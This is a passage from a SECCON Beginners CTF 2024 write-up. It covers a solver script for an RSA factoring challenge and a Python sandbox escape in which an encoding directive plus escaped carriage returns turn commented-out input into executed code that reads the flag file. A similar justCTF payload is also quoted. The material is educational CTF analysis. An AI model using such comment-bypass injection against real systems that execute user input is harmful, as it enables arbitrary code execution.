class=\"token punctuation\">(</span>b<span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> <span class=\"token number\">35760393478073168120554460439408418517938869000491575971977265241403459560088076621005967604705616322055977691364792995889012788657592539661</span> <span class=\"token operator\">==</span> <span class=\"token number\">0</span></code></pre></div>\n<p>Looking at this code, a, b, and x are all perfect squares; a and b are p and q minus x respectively; and both are divisible by a large number (i.e., mod = 0).</p>\n<p>Since ab is the product of perfect squares a and b, factoring it allows us to 
narrow down the possible values of a and b.</p>\n<p>Using the hint values provided and factordb, I found that there are 14 possible patterns for the values of a and b.</p>\n<p>Also, since p = a+x and q = b+x, and p*q = n, the equation <code>x**2 + (a+b)*x + (ab-n) = 0</code> holds.</p>\n<p>Since there are only 14 patterns for a and b to brute-force, we can identify the correct a, b, and x by finding the case where the solution x is a positive integer and a perfect square.</p>\n<p>Using the identified a, b, and x, we can also determine p and q, then decrypt the ciphertext to obtain the flag.</p>\n<p>Finally, I obtained the flag with the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> gmpy2\n<span class=\"token keyword\">import</span> sympy <span class=\"token keyword\">as</span> sp\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>number <span class=\"token keyword\">import</span> long_to_bytes<span class=\"token punctuation\">,</span> isPrime\n\nn <span class=\"token operator\">=</span> <span class=\"token number\">28347962831882769454618553954958819851319579984482333000162492691021802519375697262553440778001667619674723497501026613797636156704754646434775647096967729992306225998283999940438858680547911512073341409607381040912992735354698571576155750843940415057647013711359949649220231238608229533197681923695173787489927382994313313565230817693272800660584773413406312986658691062632592736135258179504656996785441096071602835406657489695156275069039550045300776031824520896862891410670249574658456594639092160270819842847709283108226626919671994630347532281842429619719214221191667701686004691774960081264751565207351509289</span>\nab <span class=\"token operator\">=</span> <span class=\"token 
number\">28347962831882769454618553954958819851319579984482333000162492691021802519375697262553440778001667619674723497501026613797636156704754646434775647096967729992306225998283999940438858680547911512073341409607381040912992735354698571576155750843940415057647013711359949649102926524363237634349331663931595027679709000404758309617551370661140402128171288521363854241635064819660089300995273835099967771608069501973728126045089426572572945113066368225450235783211375678087346640641196055581645502430852650520923184043404571923469007524529184935909107202788041365082158979439820855282328056521446473319065347766237878289</span>\n\nBa <span class=\"token operator\">=</span> <span class=\"token number\">4701715889239073150754995341656203385876367121921416809690629011826585737797672332435916637751589158510308840818034029338373257253382781336806660731169</span>\nBb <span class=\"token operator\">=</span> <span class=\"token number\">35760393478073168120554460439408418517938869000491575971977265241403459560088076621005967604705616322055977691364792995889012788657592539661</span>\n<span class=\"token keyword\">assert</span> gmpy2<span class=\"token punctuation\">.</span>mpz<span class=\"token punctuation\">(</span>ab<span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> Ba <span class=\"token operator\">==</span> <span class=\"token number\">0</span>\n<span class=\"token keyword\">assert</span> gmpy2<span class=\"token punctuation\">.</span>mpz<span class=\"token punctuation\">(</span>ab<span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> Bb <span class=\"token operator\">==</span> <span class=\"token number\">0</span>\n\nr <span class=\"token operator\">=</span> gmpy2<span class=\"token punctuation\">.</span>mpz<span class=\"token punctuation\">(</span>ab<span class=\"token punctuation\">)</span> <span class=\"token operator\">//</span> Ba <span class=\"token operator\">//</span> Bb\n<span class=\"token 
keyword\">assert</span> r <span class=\"token operator\">==</span> <span class=\"token number\">168602179130542941829360938763588913033950728808204687738344939756690772499463147969992071622543050423641037178339406288176679147723646123266772165646828805533748632218062968267049753205615282207629849772408015254265200980724449082839150022450439661030563736824487531287491910398220288816325848224837808525851343383555765621</span>\n<span class=\"token comment\"># http://factordb.com/index.php?query=168602179130542941829360938763588913033950728808204687738344939756690772499463147969992071622543050423641037178339406288176679147723646123266772165646828805533748632218062968267049753205615282207629849772408015254265200980724449082839150022450439661030563736824487531287491910398220288816325848224837808525851343383555765621</span>\n\nt1 <span class=\"token operator\">=</span> <span class=\"token number\">306606827773</span> <span class=\"token operator\">**</span> <span class=\"token number\">2</span>\nt2 <span class=\"token operator\">=</span> <span class=\"token number\">199</span> <span class=\"token operator\">**</span> <span class=\"token number\">2</span>\nt3 <span class=\"token operator\">=</span> <span class=\"token number\">173</span> <span class=\"token operator\">**</span> <span class=\"token number\">2</span>\nt4 <span class=\"token operator\">=</span> <span class=\"token number\">3</span> <span class=\"token operator\">**</span> <span class=\"token number\">2</span>\n<span class=\"token keyword\">assert</span> Ba<span class=\"token operator\">**</span><span class=\"token number\">2</span> <span class=\"token operator\">*</span> Bb<span class=\"token operator\">**</span><span class=\"token number\">2</span> <span class=\"token operator\">*</span> t1 <span class=\"token operator\">*</span> t2 <span class=\"token operator\">*</span> t3 <span class=\"token operator\">*</span> t4 <span class=\"token operator\">==</span> ab\n\n<span class=\"token keyword\">def</span> 
<span class=\"token function\">is_square</span><span class=\"token punctuation\">(</span>n<span class=\"token punctuation\">:</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> gmpy2<span class=\"token punctuation\">.</span>isqrt<span class=\"token punctuation\">(</span>n<span class=\"token punctuation\">)</span> <span class=\"token operator\">**</span> <span class=\"token number\">2</span> <span class=\"token operator\">==</span> n\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">is_positive_integer_and_perfect_square</span><span class=\"token punctuation\">(</span>num<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">if</span> num<span class=\"token punctuation\">.</span>is_integer <span class=\"token keyword\">and</span> num <span class=\"token operator\">></span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        sqrt_num <span class=\"token operator\">=</span> sp<span class=\"token punctuation\">.</span>sqrt<span class=\"token punctuation\">(</span>num<span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">return</span> sqrt_num<span class=\"token punctuation\">.</span>is_integer\n    <span class=\"token keyword\">return</span> <span class=\"token boolean\">False</span>\n\nL <span class=\"token operator\">=</span> \\\n<span class=\"token punctuation\">[</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t2<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t2<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t3<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t3<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token 
punctuation\">,</span> t2<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t2<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t2<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t4<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">[</span>t4<span class=\"token punctuation\">,</span> t1<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t2<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t4<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t2<span class=\"token punctuation\">,</span> t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span>t1<span class=\"token punctuation\">,</span> t2<span class=\"token punctuation\">,</span> t4<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">[</span>t3<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span>\n\n<span class=\"token keyword\">for</span> l <span class=\"token keyword\">in</span> L<span class=\"token punctuation\">:</span>\n    a <span class=\"token operator\">=</span> Ba<span class=\"token operator\">**</span><span class=\"token number\">2</span>\n    b <span class=\"token operator\">=</span> Bb<span class=\"token 
operator\">**</span><span class=\"token number\">2</span>\n    <span class=\"token keyword\">for</span> A <span class=\"token keyword\">in</span> l<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">:</span>\n        a <span class=\"token operator\">*=</span> A\n    <span class=\"token keyword\">for</span> B <span class=\"token keyword\">in</span> l<span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">:</span>\n        b <span class=\"token operator\">*=</span> B\n\n    <span class=\"token keyword\">assert</span> is_square<span class=\"token punctuation\">(</span>a<span class=\"token punctuation\">)</span> <span class=\"token keyword\">and</span> is_square<span class=\"token punctuation\">(</span>b<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">assert</span> a<span class=\"token operator\">*</span>b <span class=\"token operator\">==</span> ab\n\n    x <span class=\"token operator\">=</span> sp<span class=\"token punctuation\">.</span>symbols<span class=\"token punctuation\">(</span><span class=\"token string\">'x'</span><span class=\"token punctuation\">)</span>\n    A <span class=\"token operator\">=</span> a <span class=\"token operator\">+</span> b\n    B <span class=\"token operator\">=</span> ab <span class=\"token operator\">-</span> n\n    equation <span class=\"token operator\">=</span> x<span class=\"token operator\">**</span><span class=\"token number\">2</span> <span class=\"token operator\">+</span> A<span class=\"token operator\">*</span>x <span class=\"token operator\">+</span> B\n    solutions <span class=\"token operator\">=</span> sp<span class=\"token punctuation\">.</span>solve<span class=\"token punctuation\">(</span>equation<span class=\"token punctuation\">,</span> x<span class=\"token punctuation\">)</span>\n    
<span class=\"token keyword\">for</span> solution <span class=\"token keyword\">in</span> solutions<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">if</span> sp<span class=\"token punctuation\">.</span>im<span class=\"token punctuation\">(</span>solution<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n            real_solution <span class=\"token operator\">=</span> sp<span class=\"token punctuation\">.</span>re<span class=\"token punctuation\">(</span>solution<span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">if</span> is_positive_integer_and_perfect_square<span class=\"token punctuation\">(</span>real_solution<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"a=</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>a<span class=\"token punctuation\">}</span></span><span class=\"token string\">,b=</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>b<span class=\"token punctuation\">}</span></span><span class=\"token string\">,x=</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>real_solution<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n\na <span class=\"token operator\">=</span> <span class=\"token 
number\">7878824508023825320620552438859131751341011236435661361507465408511567856339128586549369157062948927445512194472763840898824746924636029850659802261912150719575815528250042476759316872507696855084778513881881419453874766724167271062172560745165185117184785529887592443222251487197342298902245870192371299449</span>\nb <span class=\"token operator\">=</span> <span class=\"token number\">3597993939706753790208197378148848949822043309769682578959924290719006420996423496659961817582141773260972861724771414278651046463502978594910794197098988322222621708534481711002211659109357402539392364289580131703038942827590851390068976436194200123404980430263753899361953534498940931686689517154815683161</span>\nx <span class=\"token operator\">=</span> <span class=\"token number\">10221013321700464817330531356688256100</span>\np <span class=\"token operator\">=</span> a <span class=\"token operator\">+</span> x\nq <span class=\"token operator\">=</span> b <span class=\"token operator\">+</span> x\ne <span class=\"token operator\">=</span> <span class=\"token number\">65537</span>\nc <span class=\"token operator\">=</span> <span class=\"token number\">21584943816198288600051522080026276522658576898162227146324366648480650054041094737059759505699399312596248050257694188819508698950101296033374314254837707681285359377639170449710749598138354002003296314889386075711196348215256173220002884223313832546315965310125945267664975574085558002704240448393617169465888856233502113237568170540619213181484011426535164453940899739376027204216298647125039764002258210835149662395757711004452903994153109016244375350290504216315365411682738445256671430020266141583924947184460559644863217919985928540548260221668729091080101310934989718796879197546243280468226856729271148474</span>\n<span class=\"token keyword\">assert</span> isPrime<span class=\"token punctuation\">(</span>p<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">assert</span> isPrime<span class=\"token 
punctuation\">(</span>q<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">assert</span> p <span class=\"token operator\">!=</span> q\n<span class=\"token keyword\">assert</span> n <span class=\"token operator\">==</span> p <span class=\"token operator\">*</span> q\n\nphi_n <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>p <span class=\"token operator\">-</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">*</span> <span class=\"token punctuation\">(</span>q <span class=\"token operator\">-</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\nd <span class=\"token operator\">=</span> sp<span class=\"token punctuation\">.</span>mod_inverse<span class=\"token punctuation\">(</span>e<span class=\"token punctuation\">,</span> phi_n<span class=\"token punctuation\">)</span>\nm <span class=\"token operator\">=</span> <span class=\"token builtin\">pow</span><span class=\"token punctuation\">(</span>c<span class=\"token punctuation\">,</span> d<span class=\"token punctuation\">,</span> n<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>long_to_bytes<span class=\"token punctuation\">(</span>m<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"commentatormisc\" style=\"position:relative;\"><a href=\"#commentatormisc\" aria-label=\"commentatormisc permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 
1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>commentator(Misc)</h2>\n<blockquote>\n<p>Be careful with comments!</p>\n<p>nc commentator.beginners.seccon.games 4444</p>\n</blockquote>\n<p>The following code is provided for the challenge.</p>\n<p>It appears to be an application that prepends <code class=\"language-text\">#</code> to each line of the received input to comment it out, saves it as a Python file, and executes it.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\">#!/usr/local/bin/python</span>\n\n<span class=\"token keyword\">import</span> os\n<span class=\"token keyword\">import</span> uuid\n\n<span class=\"token comment\">############################## Logo ##############################</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>\n    <span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"                                          _        _                  __\n  ___ ___  _ __ ___  _ __ ___   ___ _ __ | |_ __ _| |_ ___  _ __   _  \\\\ \\\\\n / __/ _ \\\\| '_ ` _ \\\\| '_ ` _ \\\\ / _ \\\\ '_ \\\\| __/ _` | __/ _ \\\\| '__| (_)  | |\n| (_| (_) | | | | | | | | | | |  __/ | | | || (_| | || (_) | |     _   | |\n \\\\___\\\\___/|_| |_| |_|_| |_| |_|\\\\___|_| |_|\\\\__\\\\__,_|\\\\__\\\\___/|_|    (_)  | |\n                                                                       /_/\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span><span class=\"token string\">\"-\"</span> <span class=\"token operator\">*</span> <span class=\"token number\">75</span><span class=\"token punctuation\">}</span></span><span class=\"token string\">\nEnter your Python code (ends with __EOF__)\"\"\"</span></span>\n<span class=\"token punctuation\">)</span>\n<span class=\"token comment\">############################## Logo 
##############################</span>\n\npython <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span>\n<span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n    line <span class=\"token operator\">=</span> <span class=\"token builtin\">input</span><span class=\"token punctuation\">(</span><span class=\"token string\">\">>> \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>replace<span class=\"token punctuation\">(</span><span class=\"token string\">\"\\r\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token string\">\"__EOF__\"</span> <span class=\"token keyword\">in</span> line<span class=\"token punctuation\">:</span>\n        python <span class=\"token operator\">+=</span> <span class=\"token string\">'print(\"thx :)\")'</span>\n        <span class=\"token keyword\">break</span>\n    python <span class=\"token operator\">+=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"# </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>line<span class=\"token punctuation\">}</span></span><span class=\"token string\">\\n\"</span></span>  <span class=\"token comment\"># comment :)</span>\n\npyfile <span class=\"token operator\">=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"/tmp/</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>uuid<span class=\"token punctuation\">.</span>uuid4<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">}</span></span><span class=\"token string\">.py\"</span></span>\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span 
class=\"token punctuation\">(</span>pyfile<span class=\"token punctuation\">,</span> <span class=\"token string\">\"w\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>python<span class=\"token punctuation\">)</span>\n\nos<span class=\"token punctuation\">.</span>system<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"python </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>pyfile<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\nos<span class=\"token punctuation\">.</span>remove<span class=\"token punctuation\">(</span>pyfile<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Since Python’s input function reads data up to <code class=\"language-text\">\\n</code>, using <code class=\"language-text\">\\r</code> could bypass the <code class=\"language-text\">#</code> prepending and allow execution of arbitrary Python code.</p>\n<p>However, in this challenge, <code class=\"language-text\">.replace(\"\\r\", \"\")</code> removes <code class=\"language-text\">\\r</code>, so this approach cannot be used.</p>\n<p>After trying various inputs to find a way to bypass the comment-out, I shifted my focus to whether any operation could be performed even while the code is commented out.</p>\n<p>As a result, although the shebang wasn’t particularly useful since the script is executed via <code class=\"language-text\">os.system(f\"python {pyfile}\")</code>, I confirmed that the <code class=\"language-text\">#coding:</code> directive still takes effect.</p>\n<p>When I looked into the benefits of specifying an encoding with <code class=\"language-text\">#coding:</code> in a Python script file, I found the 
following information.</p>\n<blockquote>\n<p>This PEP proposes to introduce a syntax to declare the encoding of a Python source file. The encoding information is then used by the Python parser to interpret the file using the given encoding. Most notably this enhances the interpretation of Unicode literals in the source code and makes it possible to write Unicode literals using e.g. UTF-8 directly in an Unicode aware editor.</p>\n</blockquote>\n<p>Reference: <a href=\"https://peps.python.org/pep-0263/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">PEP 263 – Defining Python Source Code Encodings | peps.python.org</a></p>\n<p>Reference: <a href=\"https://docs.python.org/ja/3/library/codecs.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">codecs — Codec Registry and Base Classes — Python 3.12.4 Documentation</a></p>\n<p>It appears that specifying the source code encoding appropriately enables the interpretation of Unicode literals written in UTF-8.</p>\n<p>So, I entered <code class=\"language-text\">coding: raw_unicode_escape</code> on the first line to set the script encoding to <code class=\"language-text\">raw_unicode_escape</code>, then used the Unicode character <code class=\"language-text\">\\u000d</code> to insert a carriage return without triggering the <code class=\"language-text\">\\r</code> removal, thereby enabling arbitrary Python code execution.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">coding<span class=\"token punctuation\">:</span> raw_unicode_escape\n\\u000dimport os\n\\u000dos<span class=\"token punctuation\">.</span>system<span class=\"token punctuation\">(</span><span class=\"token string\">\"cat /flag*.txt\"</span><span class=\"token punctuation\">)</span>\n__EOF__</code></pre></div>\n<p>Providing this input allows us to identify the correct flag.</p>\n<p><img src=\"/static/aad11705cc2cfef20731be75dc4fec16/2e195/image-20240616080331071.png\" alt=\"image-20240616080331071\" title=\"image-20240616080331071\" /></p>\n<p>Incidentally, there was also a similar pyjail challenge in another CTF where the flag could be obtained using <code class=\"language-text\">#coding: raw_unicode_escape</code> and sending byte characters in Unicode notation.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\">#coding: raw_unicode_escape</span>\nx<span class=\"token operator\">=</span><span class=\"token string\">'PEKO\\u0027\\u002b\\u0062\\u0072\\u0065\\u0061\\u006b\\u0070\\u006f\\u0069\\u006e\\u0074\\u0028\\u0029\\u002b\\u0027'</span></code></pre></div>\n<p>Reference: <a href=\"https://blog.maple3142.net/2023/06/05/justctf-2023-writeups/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">justCTF 2023 WriteUps | 廢文集中區</a></p>\n<h2 id=\"summary\" style=\"position:relative;\">Summary</h2>\n<p>As for the kernel exploitation challenge that appeared again this year, I was completely stuck on it, so I’ll work on it another day.</p>","fields":{"slug":"/ctf-sec4b-2024-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/crypto-en/","/tag/misc-en/","/tag/english/"]},"frontmatter":{"date":"2024-06-16","description":"Writeup for SECCON Beginners CTF 2024.","tags":["Rev (en)","Pwn (en)","Crypto (en)","Misc (en)","English"],"title":"SECCON Beginners CTF 2024 Writeup","socialImage":{"publicURL":"/static/d1cd078797f89a002356ff929739e47a/ctf-sec4b-2024.png"}}}},"pageContext":{"slug":"/ctf-sec4b-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}